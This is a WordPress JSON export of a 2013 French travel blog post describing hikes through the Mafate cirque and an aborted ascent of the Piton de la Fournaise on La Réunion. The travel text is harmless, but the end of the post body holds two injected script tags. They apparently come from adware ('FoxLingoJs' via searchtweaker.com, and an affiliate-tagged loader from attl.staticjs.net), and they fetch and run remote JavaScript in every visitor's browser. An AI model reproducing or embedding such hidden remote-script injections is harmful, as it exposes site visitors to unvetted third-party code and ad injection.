{"id":1839,"date":"2013-03-23T10:58:41","date_gmt":"2013-03-23T10:58:41","guid":{"rendered":"http:\/\/www.mondetourdumonde.com\/?p=1839"},"modified":"2018-01-28T18:51:00","modified_gmt":"2018-01-28T18:51:00","slug":"repos-a-la-reunion","status":"publish","type":"post","link":"http:\/\/www.mondetourdumonde.com\/?p=1839","title":{"rendered":"Repos \u00e0 la R\u00e9union"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Mafate-39.jpg\"><img loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-1842\" src=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Mafate-39-150x150.jpg\" alt=\"Mafate (39)\" width=\"150\" height=\"150\" \/><\/a>\u00a0Ultime \u00e9tape de mon d\u00e9tour du monde : La R\u00e9union, histoire de me reposer un peu avant de rentrer et de me confronter \u00e0 nouveau au quotidien. Tel \u00e9tait le plan initial. Car finalement, cela n&rsquo;a pas \u00e9t\u00e9 totalement de tout repos. Le premier week end a \u00e9t\u00e9 assez calme, Fred m&rsquo;a fait visiter un peu l&rsquo;\u00eele, petite rando pour avoir une id\u00e9e du paysage, quelques instants sur la plage puis, comme il faisait trop chaud, rafraichissement au bord de la piscine. Puis, il fallait bien que je m&rsquo;occupe la semaine pendant que Fred \u00e9tait au bloc, donc premi\u00e8re rando de 3 jours entre Cilaos et la Rivi\u00e8re des Galets : en moyenne 8 heures de marche par jour au milieu du cirque de Mafate sous un soleil de plomb. C&rsquo;\u00e9tait vraiment tr\u00e8s beau et sympa.<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.mondetourdumonde.com\/?attachment_id=1841\"><img loading=\"lazy\" class=\"wp-image-1841 size-full alignnone\" src=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Mafate-2.jpg\" alt=\"\" width=\"800\" height=\"533\" srcset=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Mafate-2.jpg 800w, http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Mafate-2-300x199.jpg 300w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p style=\"text-align: justify;\">Je devais remettre \u00e7a la deuxi\u00e8me semaine avec un parcours pr\u00e9vu entre Saint Philippe et Hell-Bourg, en passant par le Volcan et le Piton des Neiges. Ainsi, en consid\u00e9rant les 2 semaines de rando, je devais traverser l&rsquo;\u00eele selon la diagonale des Fous (pour ceux qui ne connaissent pas, c&rsquo;est un ultra trail de 165 km et 10 000 m de d\u00e9nivel\u00e9es + en 66 heures max). Comme je ne suis pas folle, je pr\u00e9voyais 8 jours pour accomplir tout \u00e7a. Si la m\u00e9t\u00e9o a \u00e9t\u00e9 franchement cl\u00e9mente la premi\u00e8re semaine, j&rsquo;ai essuy\u00e9 de v\u00e9ritables averses lors de l&rsquo;ascension du Volcan, et j&rsquo;ai d\u00fb abandonner \u00e0 Bourg-Murat. Malgr\u00e9 tout, j&rsquo;ai d\u00e9couvert une partie de la R\u00e9union et ai vraiment envie de revenir en saison s\u00e8che pour mieux appr\u00e9cier les paysages et les randos.<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Piton-de-la-fournaise-13.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1840\" src=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Piton-de-la-fournaise-13.jpg\" alt=\"Piton de la fournaise (13)\" width=\"800\" height=\"533\" srcset=\"http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Piton-de-la-fournaise-13.jpg 800w, http:\/\/www.mondetourdumonde.com\/.\/wp-content\/uploads\/2013\/03\/Piton-de-la-fournaise-13-300x199.jpg 300w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ <![CDATA[ (function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); \/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vd3d3Lm1vbmRldG91cmR1bW9uZGUuY29tL3dwLWFkbWluL3Bvc3QtbmV3LnBocCIsIndpZHRoIjoxNzA4LCJoZWlnaHQiOjk2MCwibG9hZGVyX2NsaWVudF90aW1lc3RhbXAiOjEzNjM5NTc1ODI0NTh9.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0Ultime \u00e9tape de mon d\u00e9tour du monde : La R\u00e9union, histoire de me reposer un peu avant de rentrer et de me confronter \u00e0 nouveau au quotidien. Tel \u00e9tait le plan initial. Car finalement, cela n&rsquo;a pas \u00e9t\u00e9 totalement de tout repos. Le premier week end a \u00e9t\u00e9 assez calme, Fred m&rsquo;a fait visiter un [&#8230;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_links_to":"","_links_to_target":""},"categories":[9,5],"tags":[],"_links":{"self":[{"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=\/wp\/v2\/posts\/1839"}],"collection":[{"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1839"}],"version-history":[{"count":9,"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=\/wp\/v2\/posts\/1839\/revisions"}],"predecessor-version":[{"id":10473,"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=\/wp\/v2\/posts\/1839\/revisions\/10473"}],"wp:attachment":[{"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1839"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.mondetourdumonde.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}